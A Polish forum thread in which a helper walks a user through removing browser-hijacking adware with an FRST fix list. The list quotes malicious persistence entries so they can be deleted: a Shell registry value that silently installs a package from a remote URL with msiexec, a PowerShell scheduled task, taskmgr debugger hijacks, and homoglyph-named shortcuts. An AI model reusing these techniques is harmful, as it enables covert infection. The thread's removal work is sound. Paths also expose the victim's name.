Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Ourluckysites, Kitty, iSafe i inne?

kylupl91 07 Maj 2017 12:53 498 5
  • #1 07 Maj 2017 12:53
    kylupl91
    Poziom 2  

    Proszę o pomoc, mam od jakiegoś czasu problem z komputerem.

    Ourluckysites, Kitty, iSafe.
    Na komputerze mam Mozille mimo iż nie instalowałem i nie mam jej w DodajUsuń Program....

    W załączniku różne skany.

    Ourluckysites, Kitty, iSafe i inne?

    Probuje usuwać ale dalej są, pomoże ktoś?

    0 5
  • CControls
  • #2 07 Maj 2017 13:04
    Kolobos
    Spec od komputerów

    Zrob kopie zakladek z FF, profil przegladarki zostanie usuniety.

    W ustawieniach Chrome wylacz przywracanie zestawu stron po starcie przegladarki.

    Odinstaluj YAC(Yet Another Cleaner!)

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Dayglad\Application\chrome.exe" "%1" <==== UWAGA
    CustomCLSID: HKU\S-1-5-21-1918708475-468582227-3343396697-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Krzysztof Romanowski\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileSyncShell64.dll => Brak pliku
    CustomCLSID: HKU\S-1-5-21-1918708475-468582227-3343396697-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Krzysztof Romanowski\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileSyncShell64.dll => Brak pliku
    CustomCLSID: HKU\S-1-5-21-1918708475-468582227-3343396697-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Krzysztof Romanowski\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileSyncShell64.dll => Brak pliku
    Task: {57416705-A3A5-48EA-9515-6916AE6B2FE5} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA
    Task: {C4CBD57D-7C37-478E-B536-AC06243069B0} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {C598AF47-132C-47B7-84A3-67D74221EDBE} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA
    Task: {F08701EA-78B8-4736-8BF4-0132095649EB} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA
    ShortcutWithArgument: C:\Users\Krzysztof Romanowski\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    ShortcutWithArgument: C:\Users\Krzysztof Romanowski\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gооglе Сhrоmе.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX




    2017-05-05 23:19 - 2017-05-02 08:44 - 00323584 _____ () C:\Users\Krzysztof Romanowski\AppData\Local\background_fault\bf.dll
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\...\Run: [background_fault] => C:\Users\Krzysztof Romanowski\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-03] (AVAST Software) <===== UWAGA
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1LFTZLMkI2OTJQRYQXFjE1MWVSMWhYFkIxNTRXNUExMH== /q
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\...\MountPoints2: {5a072129-0e29-11e7-9bfe-9c5c8e51e4cf} - "G:\HiSuiteDownLoader.exe"
    HKU\S-1-5-18\...\Run: [] => [X]
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\$McRebootA5E6DEAA56$.lnk [2017-04-28]
    ShortcutTarget: $McRebootA5E6DEAA56$.lnk -> (Brak pliku)
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    SearchScopes: HKU\S-1-5-21-1918708475-468582227-3343396697-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1918708475-468582227-3343396697-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    Edge HomeButtonPage: HKU\S-1-5-21-1918708475-468582227-3343396697-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    FF DefaultProfile: jg3fwavc.default
    FF ProfilePath: C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox\Firefox\Profiles\jg3fwavc.default [2017-05-07]
    FF Extension: (HSearch) - C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox\Firefox\Profiles\jg3fwavc.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-05-03] [Brak podpisu cyfrowego]
    FF Extension: (FF Adr) - C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox\Firefox\Profiles\jg3fwavc.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-03] [Brak podpisu cyfrowego]
    FF Extension: (Polski Language Pack) - C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox\Firefox\Profiles\jg3fwavc.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-03] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox\Firefox\Profiles\jg3fwavc.default\searchplugins\startsearch.xml [2017-05-03]
    CHR DefaultProfile: Default
    CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1493789952&z=0933a8ea31145acb77130a9g0zet7cemfb4t5t3z8w&from=ypid&uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...SHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
    StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=...;uid=TOSHIBAXDT01ACA100_Y5PP4S0NSXXY5PP4S0NSX
    HKU\S-1-5-21-1918708475-468582227-3343396697-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Dayglad\Application\chrome.exe <==== UWA
    R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [Brak podpisu cyfrowego]
    S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
    R2 Kitty; C:\Users\Krzysztof Romanowski\AppData\Local\Kitty\Kitty.dll [123904 2017-05-03] (word) [Brak podpisu cyfrowego] <==== UWAGA
    R2 WinSAPSvc; C:\Users\Krzysztof Romanowski\AppData\Roaming\WinSAPSvc\WinSAP.dll [603648 2017-05-05] (WinSAP) [Brak podpisu cyfrowego] <==== UWAGA
    S2 3DM; C:\Users\Krzysztof Romanowski\AppData\Local\3DM\Kitty.dll [X]
    S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X]
    S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
    S2 IISvr; C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\te\msdeploy.resources.dll [X]
    2017-05-05 23:19 - 2017-05-07 09:30 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\background_fault
    2017-05-05 23:18 - 2017-05-05 23:18 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\WANARE
    2017-05-05 23:18 - 2017-05-05 23:18 - 00000000 ____D C:\ProgramData\BIT
    2017-05-03 23:27 - 2017-05-07 11:05 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-05-03 23:27 - 2017-05-05 23:19 - 00003622 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-05-03 23:27 - 2017-05-05 23:19 - 00000000 ____D C:\WINDOWS\psgo
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Roaming\Firefox
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\SNAREA
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\Kitty
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\Firefox
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\Dayglad
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Program Files (x86)\IIS
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 ____D C:\Program Files (x86)\Dayglad
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 _____ C:\WINDOWS\SysWOW64\33
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
    2017-05-03 23:27 - 2017-05-03 23:27 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-05-02 11:40 - 2017-05-05 23:18 - 00003708 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-05-02 11:40 - 2017-05-05 23:18 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Roaming\WinSAPSvc
    2017-05-02 11:40 - 2017-05-03 07:39 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Local\SNARE
    2017-05-02 11:40 - 2017-05-02 11:40 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-28 20:43 - 2017-05-07 11:53 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-28 19:58 - 2017-05-07 10:48 - 00000000 ____D C:\AdwCleaner
    2017-04-28 13:39 - 2017-04-28 20:12 - 00000000 ____D C:\ProgramData\McAfee
    2017-04-27 21:05 - 2017-04-28 20:21 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-27 21:04 - 2017-04-27 21:04 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Roaming\Elex-tech
    2017-04-27 21:04 - 2017-04-27 21:04 - 00000000 ____D C:\Program Files (x86)\Elex-tech
    2017-04-25 18:55 - 2017-04-25 18:55 - 00000007 _____ C:\WINDOWS\SysWOW64\81F6.tmp
    2017-04-25 18:50 - 2017-05-03 07:38 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-25 12:07 - 2017-04-25 12:07 - 00000000 ____D C:\Program Files (x86)\Adware Removal Tool by TSA
    2017-04-25 10:32 - 2017-04-25 10:32 - 00000016 _____ C:\ProgramData\mntemp
    2017-04-20 11:01 - 2017-04-25 18:55 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-19 08:22 - 2017-04-20 17:55 - 00000000 _____ C:\WINDOWS\SysWOW64\1
    2017-04-19 08:21 - 2017-04-20 11:01 - 00000000 ____D C:\Program Files (x86)\MK
    2017-04-17 21:00 - 2017-05-07 11:59 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\LocalLow\Mozilla
    2017-04-17 20:59 - 2017-04-20 17:59 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
    2017-04-17 20:59 - 2017-04-17 20:59 - 00000007 _____ C:\WINDOWS\SysWOW64\B756.tmp
    2017-04-17 20:59 - 2017-04-17 20:59 - 00000000 ____D C:\Users\Krzysztof Romanowski\AppData\Roaming\Mozilla
    2017-04-17 20:59 - 2017-04-17 20:59 - 00000000 ____D C:\ProgramData\Software
    2017-04-25 18:48 - 2017-02-07 10:59 - 00000000 ____D C:\Program Files (x86)\ScreenShot
    2017-04-25 10:32 - 2017-04-25 10:32 - 0000016 _____ () C:\ProgramData\mntemp
    EmptyTemp:

    W FRST wybierz napraw.

    0
  • CControls
  • #3 07 Maj 2017 15:19
    kylupl91
    Poziom 2  

    Większość chyba się usunęła zostało jednak dalej jeszcze kilka m.in ourluckysite jak wchodzę w chrome.

    po skanie adwcleaner w załączniku.

    0
  • #4 07 Maj 2017 15:24
    Kolobos
    Spec od komputerów

    W adwc usun wszystko co wykryl.

    Zamiesc nowe logi z FRST, ze skanowania.

    0
  • #6 07 Maj 2017 17:55
    Kolobos
    Spec od komputerów

    Usun recznie plik:
    C:\Users\Krzysztof Romanowski\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехрlоrеr.lnk

    Usun katalog C:\FRST i to wszystko.

    0